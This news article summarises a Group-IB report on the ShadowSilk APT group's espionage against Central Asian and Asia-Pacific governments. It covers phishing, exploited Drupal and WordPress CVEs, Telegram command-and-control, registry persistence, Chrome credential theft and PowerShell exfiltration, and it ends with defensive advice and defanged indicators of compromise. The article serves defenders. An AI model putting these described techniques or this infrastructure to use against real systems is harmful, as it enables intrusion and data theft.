Cybersecurity experts discovered an advanced persistent threat (APT) cluster called ShadowSilk in a thorough research published by Group-IB. Since at least 2023, this group has been actively breaching government institutions in Central Asia and the Asia-Pacific area.
The group’s operations, ongoing as of July 2025, focus primarily on data exfiltration, leveraging a sophisticated blend of publicly available exploits, penetration-testing utilities, and custom malware.
ShadowSilk’s infrastructure and toolset exhibit significant overlaps with the previously documented YoroTrooper campaigns, including shared PowerShell scripts for payload delivery and Telegram-based command-and-control (C2) mechanisms.
However, expanded analysis revealed a broader victim scope and nuanced operational profiles, prompting Group-IB to classify ShadowSilk as a distinct threat actor.
A joint operation with CERT-KG enabled the acquisition of a server image, exposing the group’s tactics, techniques, and procedures (TTPs), including evidence of Chinese and Russian-speaking operators collaborating in sub-groups.
This bilingual composition suggests potential cross-regional alliances, though the exact nature of their cooperation remains unclear.
Over 35 victims, predominantly in the government sector, have been identified, with attacks involving initial access through phishing emails that deliver password-protected archives containing executables.
These binaries establish persistence via registry modifications and facilitate remote command execution, underscoring the group’s emphasis on stealthy, long-term infiltration.
ShadowSilk’s Bilingual Operations
Further forensic examination of the seized server image highlighted ShadowSilk’s diverse arsenal, which integrates open-source penetration-testing tools like sqlmap, wpscan, fscan, gobuster, and dirsearch for reconnaissance and vulnerability scanning.
The group exploits known vulnerabilities such as CVE-2018-7600 (Drupalgeddon2), CVE-2018-7602, and CVE-2024-27956, alongside frameworks like Metasploit and Cobalt Strike for privilege escalation and lateral movement.
Custom elements include Telegram bots for C2, enabling real-time command issuance, data exfiltration, and traffic obfuscation as legitimate messenger activity.
Screenshots from operators’ workstations revealed Chinese-language interfaces, including tools like Struts2VulsTools and Godzilla webshells, pointing to Chinese-speaking members handling network penetration and internal reconnaissance.
Conversely, Russian-speaking operators appear focused on malware development, evidenced by Russian keyboard layouts, command typos (e.g., “ыскуут -ды” for “screen -ls”), and testing of Cobalt Strike beacons on their own devices.
Shared victim networks, such as those in Uzbek organizations, indicate coordinated efforts between sub-groups, with identical reconnaissance notes appearing in both contexts.
Persistence is maintained through registry keys like HKCUSoftwareMicrosoftWindowsCurrentVersionRun, while credential access involves stealing Chrome password stores and decrypting them using local keys.
Exfiltration scripts, often obfuscated PowerShell code, systematically archive and upload sensitive files (e.g., .docx, .xlsx, .pdf) to domains like pweobmxdlboi[.]com, compressing data into ZIP files for transmission.
The group has also acquired web panels like JRAT and Morf Project from darkweb forums, using them to manage infected devices without developing custom malware builders, thereby reducing operational overhead.
Evolving Campaigns
According to the report, ShadowSilk’s campaigns demonstrate adaptability, with infrastructure refreshes following exposures, such as the January 2025 “Silent Lynx” disclosure that prompted abandonment of old servers.
By June 2025, new Telegram bots and IP addresses emerged, maintaining procedural similarities like modified PowerShell commands for payload deployment (e.g., curl-based downloads to paths like C:userspublic$$.
A fraction of exfiltrated data has surfaced for sale on darkweb forums, hinting at possible monetization motives beyond espionage.
For defense, organizations should implement robust email filtering to block phishing vectors, enforce strict application controls, and apply patches for exploited CVEs.
Proactive threat hunting, combined with managed extended detection and response (MXDR) solutions, is crucial for detecting anomalies like unusual registry changes or Telegram traffic.
Monitoring darkweb leaks and leveraging threat intelligence platforms can provide early warnings, ensuring resilience against such persistent threats.
Indicators of Compromise (IOCs)
| Category | Indicator | Description |
|---|---|---|
| Domain | pweobmxdlboi[.]com | Exfiltration endpoint |
| Domain | document[.]hometowncity[.]cloud | Payload delivery |
| IP | 141[.]98[.]82[.]198 | Panel hosting |
| Hash | 471e1de3e1a7b0506f6492371a687cde4e278ed8 | Malware sample |
| Hash | ca12e8975097d1591cda08d095d4af09b05da83f | Malware sample |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
